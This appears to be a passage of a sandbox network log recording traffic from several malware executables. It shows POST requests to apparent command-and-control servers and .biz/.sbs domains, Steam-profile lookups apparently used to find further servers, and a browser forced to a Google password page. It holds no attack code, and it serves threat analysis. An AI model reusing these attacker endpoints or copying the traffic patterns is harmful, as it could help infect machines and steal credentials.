                            http://185.215.113.206/c4becf79229cb002.php
                            bb34fd4a66.exe
                            Remote address:
                            185.215.113.206:80
                            Request
                            POST /c4becf79229cb002.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJ
                            Host: 185.215.113.206
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:31 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                          • flag-us
                            POST
                            https://dare-curbys.biz/api
                            6e7c5374e5.exe
                            Remote address:
                            104.21.43.156:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: dare-curbys.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=6rhoq3vhh5ko3qt542urju82eg; expires=Sat, 29-Mar-2025 22:08:11 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=buW5Nfw%2F8zK%2B29xxKNqX40FzI17BsaQkiL8uYoWZb%2BRLfwBuK42JhI6XAYcYewYPffBtkxIlWBUGiAWaS7CdYvNml871QxK2BQZlv97wpsmXuFQz%2FgF9nc6e6eRYdSzIgaM%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec9029bed1879b9-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=53427&min_rtt=49154&rtt_var=16823&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=583&delivery_rate=60471&cwnd=253&unsent_bytes=0&cid=b2d196a79d03de51&ts=322&x=0"
                          • flag-us
                            POST
                            https://print-vexer.biz/api
                            6e7c5374e5.exe
                            Remote address:
                            104.21.35.246:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: print-vexer.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=6nic05jjpaqg289554m8gkqt1t; expires=Sat, 29-Mar-2025 22:08:11 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PWyhvpQbwwISnA6kN2bjm4FN6SWtKQ571RdmrG6U72y6zHBMtsfJ9huKMy5JP%2Fy5FDe2legsIzCSzycsRD1qpZVgIWEisFKsjgbZ2vdh5lda7H0ZH7BQINMikkFrCwQHzvE%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec9029e6c76368d-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=50894&min_rtt=49451&rtt_var=12834&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=583&delivery_rate=72332&cwnd=253&unsent_bytes=0&cid=ded434c29fbd5a13&ts=319&x=0"
                          • flag-gb
                            GET
                            https://steamcommunity.com/profiles/76561199724331900
                            6e7c5374e5.exe
                            Remote address:
                            2.22.99.85:443
                            Request
                            GET /profiles/76561199724331900 HTTP/1.1
                            Connection: Keep-Alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Host: steamcommunity.com
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Content-Type: text/html; charset=UTF-8
                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                            Cache-Control: no-cache
                            Date: Wed, 04 Dec 2024 04:21:33 GMT
                            Content-Length: 35602
                            Connection: keep-alive
                            Set-Cookie: sessionid=95be28d6f77dce3a4359ffc2; Path=/; Secure; SameSite=None
                            Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                          • flag-us
                            POST
                            https://marshal-zhukov.com/api
                            6e7c5374e5.exe
                            Remote address:
                            104.21.82.174:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: marshal-zhukov.com
                            Response
                            HTTP/1.1 403 Forbidden
                            Date: Wed, 04 Dec 2024 04:21:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Frame-Options: SAMEORIGIN
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J0CXxDMScjXdRGdvBW4etsT4IhZe8hJJIYeNAZCdDJF2Pgfl3h82VRZjD9X0AXO6cpk%2FxY9H7RHCP2gpsgVo9Km6vUnUWRlepKjp6UH5YUOtPecWtypY6dWBgZyK8iImvRiIJ68%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902a40a43ef46-LHR
                          • flag-us
                            POST
                            https://marshal-zhukov.com/api
                            6e7c5374e5.exe
                            Remote address:
                            104.21.82.174:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Cookie: __cf_mw_byp=xWu1efT3H0W2GMvuNsj2sONoFmL6J9f0XHHRVl37cWY-1733286093-0.0.1.1-/api
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 53
                            Host: marshal-zhukov.com
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=s8o9rb3odl2b4ch5vbls2v536k; expires=Sat, 29-Mar-2025 22:08:12 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=837pldU6ElXt4PylM1t4dLTbZMxCMAq8NwiFMBDCdBC12GAWiEa6Rn78I7LmnYeAKgZ%2BTF5jZm%2BLRQ0Ok1QQu82d%2F2fA%2BY0XzvCAwwIU9FvmqmB%2FUjdIZQcz4O7GcxaM1nDgU2Q%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902a46addef46-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=49858&min_rtt=47130&rtt_var=5492&sent=15&recv=13&lost=0&retrans=0&sent_bytes=8137&recv_bytes=1060&delivery_rate=210070&cwnd=257&unsent_bytes=0&cid=56234dacece1d91a&ts=397&x=0"
                          • flag-ru
                            POST
                            http://185.215.113.209/Fru7Nk9/index.php
                            rundll32.exe
                            Remote address:
                            185.215.113.209:80
                            Request
                            POST /Fru7Nk9/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.209
                            Content-Length: 5
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:21:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                          • flag-us
                            DNS
                            salve-windp.cyou
                            GI59vO6.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            salve-windp.cyou
                            IN A
                            Response
                          • flag-us
                            DNS
                            frogs-severz.sbs
                            GI59vO6.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            frogs-severz.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            occupy-blushi.sbs
                            GI59vO6.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            occupy-blushi.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            blade-govern.sbs
                            GI59vO6.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            blade-govern.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            story-tense-faz.sbs
                            GI59vO6.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            story-tense-faz.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            leg-sate-boat.sbs
                            GI59vO6.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            leg-sate-boat.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            disobey-curly.sbs
                            GI59vO6.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            disobey-curly.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            motion-treesz.sbs
                            GI59vO6.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            motion-treesz.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            powerful-avoids.sbs
                            GI59vO6.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            powerful-avoids.sbs
                            IN A
                            Response
                          • flag-gb
                            GET
                            https://steamcommunity.com/profiles/76561199724331900
                            GI59vO6.exe
                            Remote address:
                            2.22.99.85:443
                            Request
                            GET /profiles/76561199724331900 HTTP/1.1
                            Connection: Keep-Alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Host: steamcommunity.com
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Content-Type: text/html; charset=UTF-8
                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                            Cache-Control: no-cache
                            Date: Wed, 04 Dec 2024 04:21:36 GMT
                            Content-Length: 25984
                            Connection: keep-alive
                            Set-Cookie: sessionid=624abdebdbb8593c34f7b759; Path=/; Secure; SameSite=None
                            Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                          • flag-us
                            DNS
                            youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            youtube.com
                            IN A
                            Response
                            youtube.com
                            IN A
                            172.217.169.78
                          • flag-us
                            DNS
                            spocs.getpocket.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            spocs.getpocket.com
                            IN A
                            Response
                            spocs.getpocket.com
                            IN CNAME
                            prod.ads.prod.webservices.mozgcp.net
                            prod.ads.prod.webservices.mozgcp.net
                            IN A
                            34.117.188.166
                          • flag-us
                            DNS
                            getpocket.cdn.mozilla.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            getpocket.cdn.mozilla.net
                            IN A
                            Response
                            getpocket.cdn.mozilla.net
                            IN CNAME
                            getpocket-cdn.prod.mozaws.net
                            getpocket-cdn.prod.mozaws.net
                            IN CNAME
                            prod.pocket.prod.cloudops.mozgcp.net
                            prod.pocket.prod.cloudops.mozgcp.net
                            IN A
                            34.120.5.221
                          • flag-us
                            DNS
                            youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            youtube.com
                            IN A
                            Response
                            youtube.com
                            IN A
                            172.217.169.78
                          • flag-gb
                            GET
                            https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                            firefox.exe
                            Remote address:
                            172.217.169.78:443
                            Request
                            GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                            host: youtube.com
                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                            accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                            accept-language: en-US,en;q=0.5
                            accept-encoding: gzip, deflate, br
                            upgrade-insecure-requests: 1
                            sec-fetch-dest: document
                            sec-fetch-mode: navigate
                            sec-fetch-site: none
                            sec-fetch-user: ?1
                            te: trailers
                          • flag-us
                            GET
                            https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                            firefox.exe
                            Remote address:
                            34.120.5.221:443
                            Request
                            GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                            host: getpocket.cdn.mozilla.net
                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                            accept: */*
                            accept-language: en-US,en;q=0.5
                            accept-encoding: gzip, deflate, br
                            sec-fetch-dest: empty
                            sec-fetch-mode: cors
                            sec-fetch-site: cross-site
                            if-none-match: W/"5929-ugd51AEOYnIM3QtVQeyIEGXmEkM"
                            te: trailers
                          • flag-us
                            DNS
                            prod.ads.prod.webservices.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            prod.ads.prod.webservices.mozgcp.net
                            IN A
                            Response
                            prod.ads.prod.webservices.mozgcp.net
                            IN A
                            34.117.188.166
                          • flag-us
                            DNS
                            youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            youtube.com
                            IN AAAA
                            Response
                            youtube.com
                            IN AAAA
                            2a00:1450:4009:819::200e
                          • flag-us
                            DNS
                            prod.ads.prod.webservices.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            prod.ads.prod.webservices.mozgcp.net
                            IN AAAA
                            Response
                          • flag-us
                            DNS
                            prod.pocket.prod.cloudops.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            prod.pocket.prod.cloudops.mozgcp.net
                            IN A
                            Response
                            prod.pocket.prod.cloudops.mozgcp.net
                            IN A
                            34.120.5.221
                          • flag-us
                            DNS
                            prod.content-signature-chains.prod.webservices.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            prod.content-signature-chains.prod.webservices.mozgcp.net
                            IN A
                            Response
                            prod.content-signature-chains.prod.webservices.mozgcp.net
                            IN A
                            34.160.144.191
                          • flag-us
                            DNS
                            shavar.prod.mozaws.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            shavar.prod.mozaws.net
                            IN A
                            Response
                            shavar.prod.mozaws.net
                            IN A
                            44.226.106.83
                            shavar.prod.mozaws.net
                            IN A
                            52.32.237.164
                            shavar.prod.mozaws.net
                            IN A
                            54.149.231.17
                          • flag-us
                            DNS
                            prod.content-signature-chains.prod.webservices.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            prod.content-signature-chains.prod.webservices.mozgcp.net
                            IN AAAA
                            Response
                            prod.content-signature-chains.prod.webservices.mozgcp.net
                            IN AAAA
                            2600:1901:0:92a9::
                          • flag-us
                            DNS
                            prod.pocket.prod.cloudops.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            prod.pocket.prod.cloudops.mozgcp.net
                            IN AAAA
                            Response
                            prod.pocket.prod.cloudops.mozgcp.net
                            IN AAAA
                            2600:1901:0:524c::
                          • flag-us
                            DNS
                            shavar.prod.mozaws.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            shavar.prod.mozaws.net
                            IN AAAA
                            Response
                          • flag-us
                            DNS
                            prod.remote-settings.prod.webservices.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            prod.remote-settings.prod.webservices.mozgcp.net
                            IN A
                            Response
                            prod.remote-settings.prod.webservices.mozgcp.net
                            IN A
                            34.149.100.209
                          • flag-us
                            DNS
                            prod.remote-settings.prod.webservices.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            prod.remote-settings.prod.webservices.mozgcp.net
                            IN AAAA
                            Response
                          • flag-us
                            DNS
                            www.youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            www.youtube.com
                            IN A
                            Response
                            www.youtube.com
                            IN CNAME
                            youtube-ui.l.google.com
                            youtube-ui.l.google.com
                            IN A
                            142.250.178.14
                            youtube-ui.l.google.com
                            IN A
                            216.58.201.110
                            youtube-ui.l.google.com
                            IN A
                            142.250.180.14
                            youtube-ui.l.google.com
                            IN A
                            142.250.179.238
                            youtube-ui.l.google.com
                            IN A
                            142.250.200.46
                            youtube-ui.l.google.com
                            IN A
                            172.217.169.46
                            youtube-ui.l.google.com
                            IN A
                            216.58.212.206
                            youtube-ui.l.google.com
                            IN A
                            142.250.187.206
                            youtube-ui.l.google.com
                            IN A
                            216.58.212.238
                            youtube-ui.l.google.com
                            IN A
                            172.217.169.14
                            youtube-ui.l.google.com
                            IN A
                            142.250.200.14
                            youtube-ui.l.google.com
                            IN A
                            172.217.16.238
                            youtube-ui.l.google.com
                            IN A
                            216.58.204.78
                            youtube-ui.l.google.com
                            IN A
                            142.250.187.238
                            youtube-ui.l.google.com
                            IN A
                            172.217.169.78
                          • flag-us
                            DNS
                            youtube-ui.l.google.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            youtube-ui.l.google.com
                            IN A
                            Response
                            youtube-ui.l.google.com
                            IN A
                            142.250.180.14
                            youtube-ui.l.google.com
                            IN A
                            142.250.179.238
                            youtube-ui.l.google.com
                            IN A
                            142.250.178.14
                            youtube-ui.l.google.com
                            IN A
                            142.250.200.46
                            youtube-ui.l.google.com
                            IN A
                            142.250.187.206
                            youtube-ui.l.google.com
                            IN A
                            216.58.204.78
                            youtube-ui.l.google.com
                            IN A
                            172.217.169.78
                            youtube-ui.l.google.com
                            IN A
                            172.217.169.14
                            youtube-ui.l.google.com
                            IN A
                            216.58.212.238
                            youtube-ui.l.google.com
                            IN A
                            172.217.169.46
                            youtube-ui.l.google.com
                            IN A
                            216.58.201.110
                            youtube-ui.l.google.com
                            IN A
                            172.217.16.238
                            youtube-ui.l.google.com
                            IN A
                            142.250.200.14
                            youtube-ui.l.google.com
                            IN A
                            142.250.187.238
                            youtube-ui.l.google.com
                            IN A
                            216.58.212.206
                          • flag-us
                            DNS
                            firefox-settings-attachments.cdn.mozilla.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            firefox-settings-attachments.cdn.mozilla.net
                            IN A
                            Response
                            firefox-settings-attachments.cdn.mozilla.net
                            IN CNAME
                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                            IN A
                            34.117.121.53
                          • flag-us
                            DNS
                            youtube-ui.l.google.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            youtube-ui.l.google.com
                            IN AAAA
                            Response
                            youtube-ui.l.google.com
                            IN AAAA
                            2a00:1450:4009:80a::200e
                            youtube-ui.l.google.com
                            IN AAAA
                            2a00:1450:4009:80b::200e
                            youtube-ui.l.google.com
                            IN AAAA
                            2a00:1450:4009:818::200e
                            youtube-ui.l.google.com
                            IN AAAA
                            2a00:1450:4009:817::200e
                          • flag-us
                            DNS
                            consent.youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            consent.youtube.com
                            IN A
                            Response
                            consent.youtube.com
                            IN A
                            216.58.201.110
                          • flag-us
                            DNS
                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                            IN A
                            Response
                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                            IN A
                            34.117.121.53
                          • flag-us
                            DNS
                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                            IN AAAA
                            Response
                          • flag-us
                            DNS
                            consent.youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            consent.youtube.com
                            IN A
                            Response
                            consent.youtube.com
                            IN A
                            216.58.201.110
                          • flag-gb
                            GET
                            https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                            firefox.exe
                            Remote address:
                            216.58.201.110:443
                            Request
                            GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                            host: consent.youtube.com
                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                            accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                            accept-language: en-US,en;q=0.5
                            accept-encoding: gzip, deflate, br
                            cookie: SOCS=CAAaBgiAt766Bg
                            cookie: YSC=RJiDFPWcBp4
                            cookie: __Secure-YEC=Cgs5R3RLNnpEWVM0YyjTsb-6BjIKCgJHQhIEGgAgaQ%3D%3D
                            cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaQ%3D%3D
                            upgrade-insecure-requests: 1
                            sec-fetch-dest: document
                            sec-fetch-mode: navigate
                            sec-fetch-site: none
                            sec-fetch-user: ?1
                            te: trailers
                          • flag-us
                            DNS
                            consent.youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            consent.youtube.com
                            IN AAAA
                            Response
                            consent.youtube.com
                            IN AAAA
                            2a00:1450:4009:826::200e
                          • flag-us
                            DNS
                            www.google.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            www.google.com
                            IN A
                            Response
                            www.google.com
                            IN A
                            172.217.16.228
                          • flag-us
                            DNS
                            www.google.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            www.google.com
                            IN A
                            Response
                            www.google.com
                            IN A
                            172.217.16.228
                          • flag-gb
                            GET
                            https://www.google.com/favicon.ico
                            firefox.exe
                            Remote address:
                            172.217.16.228:443
                            Request
                            GET /favicon.ico HTTP/2.0
                            host: www.google.com
                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                            accept: image/avif,image/webp,*/*
                            accept-language: en-US,en;q=0.5
                            accept-encoding: gzip, deflate, br
                            referer: https://consent.youtube.com/
                            sec-fetch-dest: image
                            sec-fetch-mode: no-cors
                            sec-fetch-site: cross-site
                            te: trailers
                          • flag-us
                            DNS
                            www.google.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            www.google.com
                            IN AAAA
                            Response
                            www.google.com
                            IN AAAA
                            2a00:1450:4009:821::2004
                          • flag-us
                            DNS
                            consent.youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            consent.youtube.com
                            IN A
                            Response
                            consent.youtube.com
                            IN A
                            216.58.201.110
                          • flag-us
                            DNS
                            consent.youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            consent.youtube.com
                            IN A
                            Response
                            consent.youtube.com
                            IN A
                            216.58.201.110
                          • flag-us
                            POST
                            https://dare-curbys.biz/api
                            rhnew.exe
                            Remote address:
                            104.21.43.156:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: dare-curbys.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=2k8nulokplmkb8cb00s00n34k6; expires=Sat, 29-Mar-2025 22:08:24 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IwEccnuyZ2CtDZFKs6ocAWF9aofdEuulKWlPYb3ZCHd3MDwthm%2FhgqecJAwT5n1j%2BQrP3ei20m3cu71nSXV7kzpCRv2MDSQZL9S7Ql0QzkADCLx86w3yEpuqBTP3%2FKOevKI%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902ede9117201-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=49750&min_rtt=47253&rtt_var=18232&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=583&delivery_rate=84639&cwnd=253&unsent_bytes=0&cid=fff88d97950827f5&ts=314&x=0"
                          • flag-us
                            POST
                            https://dare-curbys.biz/api
                            rhnew.exe
                            Remote address:
                            104.21.43.156:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
